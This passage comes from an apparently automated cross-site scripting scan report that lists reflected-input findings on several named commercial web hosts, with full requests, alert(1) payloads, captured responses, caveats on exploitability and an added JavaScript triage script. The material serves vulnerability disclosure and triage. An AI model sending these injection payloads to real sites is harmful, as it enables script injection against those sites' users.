Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:25 GMT
Connection: close

Unable to find /pacsun/mainNav2_surf3Offae557<img src=a onerror=alert(1)>aec779990ce

5.30. http://images3.pacsun.com/is/image/pacsun/mainNav2_swim3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_swim3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload c95c0<img%20src%3da%20onerror%3dalert(1)>8c10e31f2ec was submitted in REST URL parameter 4 and was echoed as c95c0<img src=a onerror=alert(1)>8c10e31f2ec in the application's response.

This proof-of-concept demonstrates that arbitrary markup, here an <img> element carrying an onerror event handler, is reflected without encoding. Caveat: the response below is a 403 served with Content-Type: text/plain, not an HTML document. A browser that honours the declared type renders the payload as text and the handler does not fire; the finding is an unencoded reflection of a path segment, exploitable only where the same content is served as HTML or is content-sniffed as HTML by a legacy browser.

Request

GET /is/image/pacsun/mainNav2_swim3Offc95c0<img%20src%3da%20onerror%3dalert(1)>8c10e31f2ec?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:37 GMT
Connection: close

Unable to find /pacsun/mainNav2_swim3Offc95c0<img src=a onerror=alert(1)>8c10e31f2ec

5.31. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_womens3Off

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload f9702<img%20src%3da%20onerror%3dalert(1)>08c67d0bd9c was submitted in REST URL parameter 4 and was echoed as f9702<img src=a onerror=alert(1)>08c67d0bd9c in the application's response.

This proof-of-concept demonstrates that arbitrary markup, here an <img> element carrying an onerror event handler, is reflected without encoding. Caveat: the response below is a 403 served with Content-Type: text/plain, not an HTML document. A browser that honours the declared type renders the payload as text and the handler does not fire; the finding is an unencoded reflection of a path segment, exploitable only where the same content is served as HTML or is content-sniffed as HTML by a legacy browser.

Request

GET /is/image/pacsun/mainNav2_womens3Offf9702<img%20src%3da%20onerror%3dalert(1)>08c67d0bd9c?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:34 GMT
Connection: close

Unable to find /pacsun/mainNav2_womens3Offf9702<img src=a onerror=alert(1)>08c67d0bd9c

5.32. http://images3.pacsun.com/is/image/pacsun/newPromo_042811 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/newPromo_042811

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload e5ba6<img%20src%3da%20onerror%3dalert(1)>f5ab3ce03c0 was submitted in REST URL parameter 4 and was echoed as e5ba6<img src=a onerror=alert(1)>f5ab3ce03c0 in the application's response.

This proof-of-concept demonstrates that arbitrary markup, here an <img> element carrying an onerror event handler, is reflected without encoding. Caveat: the response below is a 403 served with Content-Type: text/plain, not an HTML document. A browser that honours the declared type renders the payload as text and the handler does not fire; the finding is an unencoded reflection of a path segment, exploitable only where the same content is served as HTML or is content-sniffed as HTML by a legacy browser.

Request

GET /is/image/pacsun/newPromo_042811e5ba6<img%20src%3da%20onerror%3dalert(1)>f5ab3ce03c0?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:43 GMT
Connection: close

Unable to find /pacsun/newPromo_042811e5ba6<img src=a onerror=alert(1)>f5ab3ce03c0

5.33. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/pop_email_011011b

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload d2c41<img%20src%3da%20onerror%3dalert(1)>5c8d452e9c8 was submitted in REST URL parameter 4 and was echoed as d2c41<img src=a onerror=alert(1)>5c8d452e9c8 in the application's response.

This proof-of-concept demonstrates that arbitrary markup, here an <img> element carrying an onerror event handler, is reflected without encoding. Caveat: the response below is a 403 served with Content-Type: text/plain, not an HTML document. A browser that honours the declared type renders the payload as text and the handler does not fire; the finding is an unencoded reflection of a path segment, exploitable only where the same content is served as HTML or is content-sniffed as HTML by a legacy browser.

Request

GET /is/image/pacsun/pop_email_011011bd2c41<img%20src%3da%20onerror%3dalert(1)>5c8d452e9c8?$img_jpg$&$ext=.jpg HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:46 GMT
Connection: close

Unable to find /pacsun/pop_email_011011bd2c41<img src=a onerror=alert(1)>5c8d452e9c8

5.34. http://images3.pacsun.com/is/image/pacsun/redesign_social [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/redesign_social

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 25ab1<img%20src%3da%20onerror%3dalert(1)>aeaa39cfdec was submitted in REST URL parameter 4 and was echoed as 25ab1<img src=a onerror=alert(1)>aeaa39cfdec in the application's response.

This proof-of-concept demonstrates that arbitrary markup, here an <img> element carrying an onerror event handler, is reflected without encoding. Caveat: the response below is a 403 served with Content-Type: text/plain, not an HTML document. A browser that honours the declared type renders the payload as text and the handler does not fire; the finding is an unencoded reflection of a path segment, exploitable only where the same content is served as HTML or is content-sniffed as HTML by a legacy browser.

Request

GET /is/image/pacsun/redesign_social25ab1<img%20src%3da%20onerror%3dalert(1)>aeaa39cfdec?$img_gif-alpha$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:01 GMT
Connection: close

Unable to find /pacsun/redesign_social25ab1<img src=a onerror=alert(1)>aeaa39cfdec

5.35. http://images3.pacsun.com/is/image/pacsun/spacer [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/spacer

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload ee327<img%20src%3da%20onerror%3dalert(1)>a0cf7621480 was submitted in REST URL parameter 4 and was echoed as ee327<img src=a onerror=alert(1)>a0cf7621480 in the application's response.

This proof-of-concept demonstrates that arbitrary markup, here an <img> element carrying an onerror event handler, is reflected without encoding. Caveat: the response below is a 403 served with Content-Type: text/plain, not an HTML document. A browser that honours the declared type renders the payload as text and the handler does not fire; the finding is an unencoded reflection of a path segment, exploitable only where the same content is served as HTML or is content-sniffed as HTML by a legacy browser.

Request

GET /is/image/pacsun/spaceree327<img%20src%3da%20onerror%3dalert(1)>a0cf7621480?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 73
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:12 GMT
Connection: close

Unable to find /pacsun/spaceree327<img src=a onerror=alert(1)>a0cf7621480

5.36. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The value of the mbox request parameter is copied unencoded into a single-quoted JavaScript string literal, the first argument of mboxFactories.get('default').get(...), in a response served as text/javascript. The payload 15167<script>alert(1)</script>f4f6edc5c01 was submitted in the mbox parameter and was echoed unmodified in the application's response.

Caveat: the sink is a JavaScript string inside a script resource, not an HTML document, so the <script> tags in this payload are inert where they land. Breaking out of the literal would require an unescaped single quote, backslash or line terminator to be reflected, which this capture does not test. The reflection is still unencoded user input inside a script that www.guitarcenter.com pages load (see the Referer), so it warrants the same fix: encode the value for a JavaScript string context.

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events15167<script>alert(1)</script>f4f6edc5c01&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 208
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events15167<script>alert(1)</script>f4f6edc5c01',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

5.37. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied unencoded into an HTML comment (<!-- campaign : '...' *not* found -->). The payload 26383<x%20style%3dx%3aexpression(alert(1))>17d9ad9eed6 was submitted in the name parameter and was echoed as 26383<x style=x:expression(alert(1))>17d9ad9eed6 in the application's response.

The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript; this technique is specific to older versions of Internet Explorer and does not work in other browsers. Caveat: as captured, the injected element sits inside the comment and is not parsed as markup. Exploitation would additionally require the comment to be closed from within the injected value, which this report does not demonstrate.

Request

GET /serve/fb/pdc?cat=&name=landing26383<x%20style%3dx%3aexpression(alert(1))>17d9ad9eed6&sid=3167 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1305510200_11939:0_5512:44812; uid=1_1305510200_1305465388147:4406953890584386; kwd=1_1305510200; sit=1_1305510200_3166:0:0_3167:28:28_1888:44812:44812; cre=1_1305510200; bpd=1_1305510200; apd=1_1305510200; scg=1_1305510200; ppd=1_1305510200; afl=1_1305510200

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305511011_11939:811_5512:45623; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: uid=1_1305511011_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: kwd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: sit=1_1305511011_3166:811:811_3167:839:839_1888:45623:45623; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: cre=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: bpd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: apd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: scg=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: ppd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: afl=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 01:56:51 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing26383<x style=x:expression(alert(1))>17d9ad9eed6' *not* found -->
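
The following is an added example, not part of the XSS.CX report, for triaging the reflections in 5.28 to 5.37 before accepting the scanner's severity: it parses a captured response, checks whether the marker is reflected, and classifies the hit by the declared Content-Type and by whether it landed inside an HTML comment. The two sample responses are constructed from the 5.35 and 5.37 captures above (headers abbreviated); the function and verdict names are this example's own.

```javascript
// Added example (not part of the XSS.CX report): triage a captured reflection
// by the response's declared type and by where the marker lands.
// Constructed samples, rebuilt from the 5.35 and 5.37 captures on this page.
const RESPONSE_5_35 = [
  'HTTP/1.1 403 Forbidden',
  'Server: Apache-Coyote/1.1',
  'Content-Type: text/plain',
  'Content-Length: 73',
  '',
  'Unable to find /pacsun/spaceree327<img src=a onerror=alert(1)>a0cf7621480',
].join('\r\n');

const RESPONSE_5_37 = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=UTF-8',
  'Content-Length: 91',
  '',
  "<!-- campaign : 'landing26383<x style=x:expression(alert(1))>17d9ad9eed6' *not* found -->",
].join('\r\n');

// MIME types a browser parses as HTML when it honours the declared type.
const HTML_TYPES = new Set(['text/html', 'application/xhtml+xml']);

// Split a raw HTTP/1.x response into status code, lower-cased header map and body.
function parseResponse(raw) {
  const sep = raw.match(/\r?\n\r?\n/);
  const head = sep ? raw.slice(0, sep.index) : raw;
  const body = sep ? raw.slice(sep.index + sep[0].length) : '';
  const lines = head.split(/\r?\n/);
  const status = parseInt(lines[0].split(' ')[1], 10);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { status, headers, body };
}

// True when offset `at` in `body` lies inside a <!-- comment that is still open.
function insideHtmlComment(body, at) {
  const open = body.lastIndexOf('<!--', at);
  if (open < 0) return false;
  const close = body.indexOf('-->', open + 4);
  return close < 0 || close > at;
}

// Classify an unencoded reflection of `marker` in a raw response.
// Verdicts: not-reflected, reflected-html, reflected-in-html-comment,
// reflected-untyped-sniffable (no Content-Type and no nosniff), reflected-non-html.
function classifyReflection(raw, marker) {
  const res = parseResponse(raw);
  const at = res.body.indexOf(marker);
  const mime = (res.headers['content-type'] || '').split(';')[0].trim().toLowerCase();
  const nosniff = (res.headers['x-content-type-options'] || '').toLowerCase() === 'nosniff';
  let verdict;
  if (at < 0) {
    verdict = 'not-reflected';
  } else if (HTML_TYPES.has(mime)) {
    verdict = insideHtmlComment(res.body, at) ? 'reflected-in-html-comment' : 'reflected-html';
  } else if (mime === '' && !nosniff) {
    verdict = 'reflected-untyped-sniffable';
  } else {
    verdict = 'reflected-non-html';
  }
  return { status: res.status, mime, nosniff, verdict };
}

console.log(classifyReflection(RESPONSE_5_35, '<img src=a onerror=alert(1)>').verdict); // reflected-non-html
console.log(classifyReflection(RESPONSE_5_37, '<x style=x:expression(alert(1))>').verdict); // reflected-in-html-comment
```

Only reflected-html is a finding that executes as captured; the text/plain verdict for the pacsun entries and the comment verdict for fetchback are the cases where the severity above needs a second look.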

5.38. http://px.steelhousemedia.com/pr [get_px parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The value of the get_px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks (the sturl assignment in the response below). The payload cb714'-alert(1)-'9f1b1c0493f was submitted in the get_px parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the quote closes the literal and the remainder parses as 'prefix' - alert(1) - 'suffix', so alert(1) is called when the resource is executed as a script. Note that the response is JavaScript served as text/html; the payload executes where this resource is included as a script and would merely render as text if navigated to as a document.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1cb714'-alert(1)-'9f1b1c0493f&prov_id=9056 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1cb714'-alert(1)-'9f1b1c0493f&aid=9056&cb=1305542500340658&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('sc
...[SNIP]...

5.39. http://px.steelhousemedia.com/pr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb2d'-alert(1)-'136f0dfcab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1&prov_id=9056&9eb2d'-alert(1)-'136f0dfcab4=1 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1&aid=9056&9eb2d'-alert(1)-'136f0dfcab4=1&cb=1305542505819756&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('script');
...[SNIP]...

5.40. http://px.steelhousemedia.com/pr [prov_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The value of the prov_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8130e'-alert(1)-'66a20514f58 was submitted in the prov_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1&prov_id=90568130e'-alert(1)-'66a20514f58 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1&aid=90568130e'-alert(1)-'66a20514f58&cb=1305542503023599&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('script');

...[SNIP]...

5.41. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

